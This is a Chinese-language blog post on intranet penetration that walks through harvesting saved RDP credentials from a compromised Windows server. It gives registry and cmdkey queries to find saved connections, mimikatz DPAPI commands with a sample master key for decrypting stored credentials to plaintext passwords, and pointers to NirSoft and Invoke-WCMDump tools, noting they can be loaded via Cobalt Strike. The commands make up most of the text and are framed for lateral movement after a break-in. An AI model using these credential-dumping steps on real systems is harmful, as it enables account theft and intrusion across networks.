内网渗透-RDP凭据获取

admin 2022年12月10日21:18:09评论87 views字数 1092阅读3分38秒阅读模式


当我们获取一台windows服务器,可以尝试获取本地远程连接的信息

甚至可以拿到明文密码,横向移动。


通过rdp服务登录远程桌面时,如果选择了保存凭证

内网渗透-RDP凭据获取

 会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码



通过

reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s

查询注册表信息,获取rdp的计算机名,ip信息

内网渗透-RDP凭据获取



有可能这台机器保存登录其他机器rdp


#查看mstsc的连接纪录cmdkey /list 
#查找本地的Credentials:dir /a %userprofile%AppDataLocalMicrosoftCredentials*



内网渗透-RDP凭据获取

这里如果是桌面去查找,要开启显示隐藏文件


猕猴桃获取密码


如果存在,可以使用mimikatz 


记录这个值


mimikatz.exe "privilege::debug" "dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials9D26EE720EDC4D95AF94298895D92FA9"



内网渗透-RDP凭据获取


执行找到guidMasterKey值对应的guid下的MasterKer值



mimikatz.exe "privilege::debug" "sekurlsa::dpapi" >1.txt



内网渗透-RDP凭据获取



mimikatz.exe "dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials9D26EE720EDC4D95AF94298895D92FA9 /masterkey:9d112cafdfc47142e80b38fecc3c9738ff844db85ce15e2e035f21c7727a76334c725a16942df1769a0ece1e68c7aeb6a484a877d538494201029be8d7914213"



内网渗透-RDP凭据获取


破解密码,登录机器



network password


下载地址:https://www.nirsoft.net/utils/network_password_recovery.html


内网渗透-RDP凭据获取




通过powershell脚本


下载地址:https://github.com/peewpw/Invoke-WCMDump


Import-Module .Invoke-WCMDump.ps1Invoke-WCMDump


也可以直接cs加载powershell使用


原文始发于微信公众号(qin9):内网渗透-RDP凭据获取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月10日21:18:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透-RDP凭据获取https://cn-sec.com/archives/964262.html

发表评论

匿名网友 填写信息